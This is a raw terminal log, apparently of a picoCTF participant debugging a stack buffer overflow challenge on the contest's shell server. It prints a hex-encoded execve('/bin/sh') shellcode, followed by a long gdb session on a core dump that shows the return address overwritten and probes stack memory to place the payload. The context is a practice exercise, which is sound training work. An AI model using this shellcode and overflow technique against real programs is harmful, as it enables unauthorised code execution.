bp0017@bp0017-VirtualBox:~$ ls
archer  Desktop  Documents  Downloads  Music  pasta  Pictures  Public  Templates  Videos
bp0017@bp0017-VirtualBox:~$ ssh pico25903@shell2014.picoctf.com -p 22
pico25903@shell2014.picoctf.com's password: 






               _            ____ _____ _____ 
         _ __ (_) ___ ___  / ___|_   _|  ___|
        | '_ \| |/ __/ _ \| |     | | | |_   
        | |_) | | (_| (_) | |___  | | |  _|  
        | .__/|_|\___\___/ \____| |_| |_|    
        |_|                                  
* Welcome to the shell server!
* Any malicious activity is frowned upon and could result in disqualification.
* Questions should be directed to the IRC channel.
Last login: Fri Nov 18 15:03:06 2016 from mail.villageacademyschools.org
pico25903@shell:~$ ls
ExecuteMe  file  flag.cow  flag.txt  FunctionAddress  link.cow  no_overflow  overflow_core  rop1  secret1.cow  supercow
pico25903@shell:~$ cd no_overflow
pico25903@shell:~/no_overflow$ ls
cmd.txt  code.c  core  no_overflow  out  payload  pycmd.txt  shellcode  test.c  test.hex  test.o
pico25903@shell:~/no_overflow$ ls
cmd.txt  code.c  core  no_overflow  out  payload  pycmd.txt  shellcode  test.c  test.hex  test.o
pico25903@shell:~/no_overflow$ cat shellcode
31c050682f736800682f62696e89e35389e15089e2b00bcd80
pico25903@shell:~/no_overflow$ nano shell
pico25903@shell:~/no_overflow$ ls
cmd.txt  core         out      pycmd.txt  shellcode  test.hex
code.c   no_overflow  payload  shell      test.c     test.o
pico25903@shell:~/no_overflow$ nano shell
pico25903@shell:~/no_overflow$ ls
cmd.txt  code.c  core  no_overflow  out  payload  pycmd.txt  shell  shellcode  test.c  test.hex  test.o
pico25903@shell:~/no_overflow$ gdb no_overflow core
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from no_overflow...(no debugging symbols found)...done.
[New LWP 30390]
Core was generated by `./no_overflow'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x61616161 in ?? ()
(gdb) info frame
Stack level 0, frame at 0xffffd6c4:
 eip = 0x61616161; saved eip = 0x61616161
 called by frame at 0xffffd6c8
 Arglist at 0xffffd6bc, args: 
 Locals at 0xffffd6bc, Previous frame's sp is 0xffffd6c4
 Saved registers:
  eip at 0xffffd6c0
(gdb) x/100x
Argument required (starting display address).
(gdb) x/100c 0xffffd6b0
0xffffd6b0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6b8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6c0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6c8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6d0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6d8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6e0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6e8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6f0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6f8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd700:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd708:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd710:	97 'a'	97 'a'	97 'a'	97 'a'
(gdb) x/100c 0xffffd6a0
0xffffd6a0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6a8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6b0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6b8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6c0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6c8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6d0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6d8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6e0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6e8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6f0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd6f8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd700:	97 'a'	97 'a'	97 'a'	97 'a'
(gdb) x/100c 0xffffd5ca0
0xfffd5ca0:	Cannot access memory at address 0xfffd5ca0
(gdb) x/100c 0xffffd5c0
0xffffd5c0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5c8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5d0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5d8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5e0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5e8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5f0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5f8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd600:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd608:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd610:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd618:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd620:	97 'a'	97 'a'	97 'a'	97 'a'
(gdb) x/100c 0xffffd4c0
0xffffd4c0:	56 '8'	-39 '\331'	-1 '\377'	-9 '\367'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffd4c8:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	40 '('	-61 '\303'	-2 '\376'	-9 '\367'
0xffffd4d0:	-1 '\377'	-1 '\377'	-1 '\377'	-1 '\377'	84 'T'	-101 '\233'	-4 '\374'	-9 '\367'
0xffffd4d8:	-56 '\310'	86 'V'	-30 '\342'	-9 '\367'	88 'X'	-88 '\250'	-3 '\375'	-9 '\367'
0xffffd4e0:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'	0 '\000'	-128 '\200'	-3 '\375'	-9 '\367'
0xffffd4e8:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffd4f0:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	10 '\n'	0 '\000'	0 '\000'	0 '\000'
0xffffd4f8:	-104 '\230'	-88 '\250'	-4 '\374'	-9 '\367'	78 'N'	-21 '\353'	-24 '\350'	-9 '\367'
0xffffd500:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	-57 '\307'	-122 '\206'	4 '\004'	8 '\b'
0xffffd508:	-96 '\240'	-104 '\230'	-4 '\374'	-9 '\367'	64 '@'	0 '\000'	0 '\000'	0 '\000'
0xffffd510:	-56 '\310'	-122 '\206'	4 '\004'	8 '\b'	0 '\000'	-48 '\320'	-1 '\377'	-9 '\367'
0xffffd518:	56 '8'	-39 '\331'	-1 '\377'	-9 '\367'	1 '\001'	0 '\000'	0 '\000'	0 '\000'
0xffffd520:	-128 '\200'	-43 '\325'	-1 '\377'	-1 '\377'
(gdb) x/100c 0xffffd5e0
0xffffd5e0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5e8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5f0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5f8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd600:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd608:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd610:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd618:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd620:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd628:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd630:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd638:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd640:	97 'a'	97 'a'	97 'a'	97 'a'
(gdb) x/100c 0xffffd4e0
0xffffd4e0:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'	0 '\000'	-128 '\200'	-3 '\375'	-9 '\367'
0xffffd4e8:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffd4f0:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	10 '\n'	0 '\000'	0 '\000'	0 '\000'
0xffffd4f8:	-104 '\230'	-88 '\250'	-4 '\374'	-9 '\367'	78 'N'	-21 '\353'	-24 '\350'	-9 '\367'
0xffffd500:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	-57 '\307'	-122 '\206'	4 '\004'	8 '\b'
0xffffd508:	-96 '\240'	-104 '\230'	-4 '\374'	-9 '\367'	64 '@'	0 '\000'	0 '\000'	0 '\000'
0xffffd510:	-56 '\310'	-122 '\206'	4 '\004'	8 '\b'	0 '\000'	-48 '\320'	-1 '\377'	-9 '\367'
0xffffd518:	56 '8'	-39 '\331'	-1 '\377'	-9 '\367'	1 '\001'	0 '\000'	0 '\000'	0 '\000'
0xffffd520:	-128 '\200'	-43 '\325'	-1 '\377'	-1 '\377'	-127 '\201'	-95 '\241'	-2 '\376'	-9 '\367'
0xffffd528:	-16 '\360'	-38 '\332'	-1 '\377'	-9 '\367'	72 'H'	-85 '\253'	-3 '\375'	-9 '\367'
0xffffd530:	1 '\001'	0 '\000'	0 '\000'	0 '\000'	1 '\001'	0 '\000'	0 '\000'	0 '\000'
0xffffd538:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'
0xffffd540:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'
(gdb) x/100c 0xffffd4f0
0xffffd4f0:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	10 '\n'	0 '\000'	0 '\000'	0 '\000'
0xffffd4f8:	-104 '\230'	-88 '\250'	-4 '\374'	-9 '\367'	78 'N'	-21 '\353'	-24 '\350'	-9 '\367'
0xffffd500:	19 '\023'	0 '\000'	0 '\000'	0 '\000'	-57 '\307'	-122 '\206'	4 '\004'	8 '\b'
0xffffd508:	-96 '\240'	-104 '\230'	-4 '\374'	-9 '\367'	64 '@'	0 '\000'	0 '\000'	0 '\000'
0xffffd510:	-56 '\310'	-122 '\206'	4 '\004'	8 '\b'	0 '\000'	-48 '\320'	-1 '\377'	-9 '\367'
0xffffd518:	56 '8'	-39 '\331'	-1 '\377'	-9 '\367'	1 '\001'	0 '\000'	0 '\000'	0 '\000'
0xffffd520:	-128 '\200'	-43 '\325'	-1 '\377'	-1 '\377'	-127 '\201'	-95 '\241'	-2 '\376'	-9 '\367'
0xffffd528:	-16 '\360'	-38 '\332'	-1 '\377'	-9 '\367'	72 'H'	-85 '\253'	-3 '\375'	-9 '\367'
0xffffd530:	1 '\001'	0 '\000'	0 '\000'	0 '\000'	1 '\001'	0 '\000'	0 '\000'	0 '\000'
0xffffd538:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'
0xffffd540:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'
0xffffd548:	100 'd'	-43 '\325'	-1 '\377'	-1 '\377'	16 '\020'	-96 '\240'	4 '\004'	8 '\b'
0xffffd550:	108 'l'	-126 '\202'	4 '\004'	8 '\b'
(gdb) x/100c 0xffffd520
0xffffd520:	-128 '\200'	-43 '\325'	-1 '\377'	-1 '\377'	-127 '\201'	-95 '\241'	-2 '\376'	-9 '\367'
0xffffd528:	-16 '\360'	-38 '\332'	-1 '\377'	-9 '\367'	72 'H'	-85 '\253'	-3 '\375'	-9 '\367'
0xffffd530:	1 '\001'	0 '\000'	0 '\000'	0 '\000'	1 '\001'	0 '\000'	0 '\000'	0 '\000'
0xffffd538:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'
0xffffd540:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'
0xffffd548:	100 'd'	-43 '\325'	-1 '\377'	-1 '\377'	16 '\020'	-96 '\240'	4 '\004'	8 '\b'
0xffffd550:	108 'l'	-126 '\202'	4 '\004'	8 '\b'	-20 '\354'	-127 '\201'	4 '\004'	8 '\b'
0xffffd558:	32 ' '	-100 '\234'	-4 '\374'	-9 '\367'	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'
0xffffd560:	18 '\022'	0 '\000'	0 '\000'	0 '\000'	-56 '\310'	86 'V'	-30 '\342'	-9 '\367'
0xffffd568:	-79 '\261'	38 '&'	-26 '\346'	-9 '\367'	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'
0xffffd570:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffd578:	-72 '\270'	-42 '\326'	-1 '\377'	-1 '\377'	-81 '\257'	-62 '\302'	-26 '\346'	-9 '\367'
0xffffd580:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'
(gdb) x/100c 0xffffd560
0xffffd560:	18 '\022'	0 '\000'	0 '\000'	0 '\000'	-56 '\310'	86 'V'	-30 '\342'	-9 '\367'
0xffffd568:	-79 '\261'	38 '&'	-26 '\346'	-9 '\367'	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'
0xffffd570:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffd578:	-72 '\270'	-42 '\326'	-1 '\377'	-1 '\377'	-81 '\257'	-62 '\302'	-26 '\346'	-9 '\367'
0xffffd580:	-64 '\300'	-102 '\232'	-4 '\374'	-9 '\367'	-93 '\243'	-122 '\206'	4 '\004'	8 '\b'
0xffffd588:	-92 '\244'	-43 '\325'	-1 '\377'	-1 '\377'	-128 '\200'	-62 '\302'	-26 '\346'	-9 '\367'
0xffffd590:	-80 '\260'	-43 '\325'	-1 '\377'	-1 '\377'	56 '8'	-39 '\331'	-1 '\377'	-9 '\367'
0xffffd598:	0 '\000'	-112 '\220'	-4 '\374'	-9 '\367'	117 'u'	-123 '\205'	4 '\004'	8 '\b'
0xffffd5a0:	-93 '\243'	-122 '\206'	4 '\004'	8 '\b'	-80 '\260'	-43 '\325'	-1 '\377'	-1 '\377'
0xffffd5a8:	-1 '\377'	-1 '\377'	-1 '\377'	-1 '\377'	56 '8'	-39 '\331'	-1 '\377'	-9 '\367'
0xffffd5b0:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5b8:	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'	97 'a'
0xffffd5c0:	97 'a'	97 'a'	97 'a'	97 'a'
(gdb)RIP Syntax 

